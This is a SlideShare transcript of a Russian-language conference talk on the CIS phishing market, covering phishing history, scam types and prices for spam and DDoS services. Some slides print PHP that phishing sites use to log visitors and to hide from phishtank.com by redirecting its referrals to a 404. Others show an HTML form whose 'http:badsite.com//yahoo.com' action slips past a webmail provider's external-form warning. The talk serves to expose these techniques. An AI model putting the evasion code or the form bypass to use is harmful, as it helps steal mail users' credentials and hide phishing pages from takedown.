Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.

Современный рынок фишинга

120 views

Published on

Докладчик расскажет о современном рынке фишинга в СНГ, его формировании, предпосылках развития, о том, какие механизмы сейчас используются. Будут представлены практические кейсы раскрытия слабых мест почтовых сервисов и примеры того, как эти уязвимости способствуют развитию фишингового рынка.

Published in: Technology
  • Be the first to comment

  • Be the first to like this

Современный рынок фишинга

  1. 1. СОВРЕМЕННЫЙ РЫНОК ФИШИНГА MadCrush LLC Малышев Дмитрий
  2. 2. ФИШИНГ  Фи́шинг (англ. phishing, от fishing — рыбная ловля, выуживание) — вид интернет-мошенничества, целью которого является получение доступа к конфиденциальным данным пользователей—логинам и паролям.
  3. 3. НАЧАЛО: AOL  Становление технологии фишинга пришлось на 1995 год и жил на AOL (один из ранних крупнейших в США интернет- провайдеров).
  4. 4. FAX-FISHING ATTACK  Отправить email-письмо жертве от какой либо гос. структуры  Просить предоставить конфиденциальную информацию и направить по факсу  На стороне мошенника документ сканируется и перенаправляется на его почту  ???  PROFIT!
  5. 5. KEYLOGGER  Письма с простейшим программным обеспечением считывающим нажатия на клавиатуре и передающим информацию злоумышленнику
  6. 6. «ПИСЬМА СЧАСТЬЯ»  ВЫ – ПОБЕДИТЕЛЬ АКЦИИ  ВЫ – СТОМИЛЛИАРДТЫСЯЧНЫЙ ПОСЕТИТЕЛЬ  ВЫ – ЛЕГКО ЗАРАБОТАЕТЕ ВСЕ ДЕНЬГИ ЗЕМЛИ  Просто нажимай все ссылки!
  7. 7. «НИГЕРИЙСКИЕ ПИСЬМА»  Чиновник/космонавт/победитель по жизни получил много денег  Коварное нигерийское правительство не даёт возможности снять деньги  Только ТЫ можешь помочь  Просто перешли немного денег для оформления документов и открытия счёта
  8. 8. СООБЩЕНИЕ ОТ АДВОКАТОВ И ЮРИСТОВ (ИНОГДА И ОТ РОСКОМНАДЗОРА)  Вы (ВНЕЗАПНО!) получили наследство  Нужно просто оформить бумаги  Но для этого нужно прислать свои данные  (Иногда и добавить файл на сервер)
  9. 9. АТАКА КЛОНОВ  Копии легальных сайтов выглядят как настоящие  Пахнут как настоящие  Стало быть настоящие  (НЕТ)
  10. 10. ФИШИНГ И СПАМ – ЭТО НЕ ДОРОГО  Средняя цена – 1-2$ за 1000 писем  Часто есть и другие услуги сервиса: сбор клиентских баз, DDOS, взлом почты, блокировка телефонных линий, предоставление отчётов и даже обучение.
  11. 11. Я В БЛЭКХАТЫ БЫ ПОШЁЛ, ПУСТЬ МЕНЯ НАУЧАТ!  Учат всему:  Web – пентест  Работа с файерволами  Вирусостроение  Взлом почт и соцсетей  Кардинг  И проч. И проч.
  12. 12. ЦЕНЫ  Рассылка: 1-2$ за 1000 сообщений  DDOS: 60$ в день  Найм хакера: зависит от задачи, обычно до 300 евро  Обучение: сильно разнятся от 2500 до 60000 р
  13. 13. СРЕДНЯЯ ЦЕНА СПАМА 2014 год 2015 год 2016 год 0 200 400 600 800 1000 1200 1400 1600 Цена за 10000 писем Цена за 10000 писем (руб.)
  14. 14. ДИВНЫЙ НОВЫЙ МИР  SMS-фишинг (Smishing)
  15. 15. ДИВНЫЙ НОВЫЙ МИР  Вишинг - голосовой фишинг
  16. 16. ЧТО МОЖНО НАЙТИ НА ФЕЙК- САЙТЕ  1) Запись данных посетителя date_default_timezone_set(„Europe/Moscow“); $u_ip = $_SERVER[„REMOTE_ADDR“]; $u_date = date(« l d F H:i:s»); $u_agent = $_SERVER[„HTTP_USER_AGENT“]; $fop = fopen («logs/userip.txt», «a»);fputs($fop, «IP: $u_ip = DATE: $u_date — BROWSER: $u_agentrn»)
  17. 17. ЧТО МОЖНО НАЙТИ НА ФЕЙК- САЙТЕ 2) Проверка на проксирование $response = file_get_contents('http://www.shroomery.org/ythan/proxycheck.p hp?ip='.$u_ip, 0, $context); 3) А если нас проверяют, что пользователь пришел с сайта с проверкой фишинговых страниц, то можно проверить его HTTP_REFERE и перекинуть на 404. if(parse_url($_SERVER[„HTTP_REFERER“], PHP_URL_HOST) == „phishtank.com“){
  18. 18. ПРОБЛЕМЫ В ПОЧТОВЫХ СИСТЕМАХ t.message._formWhiteList = [ , «somedomain.com»], t.message.formWarning = function(s) { var i = s.getAttribute("action") , n = i.split("/")[2]; return n && (n = n.split(".").slice(-2).join("."), t.message._formWhiteList.indexOf(n) > 0) ? !0 : (e.ErrorLog.send({ event: "formWarning", host: i }), window.confirm("Вы отправляете данные на сайт, не имеющий отношения к Почтовому ресурсу. Продолжить?")) }
  19. 19. ПРОБЛЕМЫ В ПОЧТОВЫХ СИСТЕМАХ Мы отправляем письмо содержащее следующий html код (обратите внимание на action) <form action ='http:badsite.com//yahoo.com'' method=POST> <input name='show_me_the_money'><br> <input name='and_mention_on_habrahabr'><br> <input type='submit'> </form> В веб интерфейсе action будет выглядеть так: http:badsite.com//yahoo.com
  20. 20. СПАСИБО ЗА ВНИМАНИЕ

×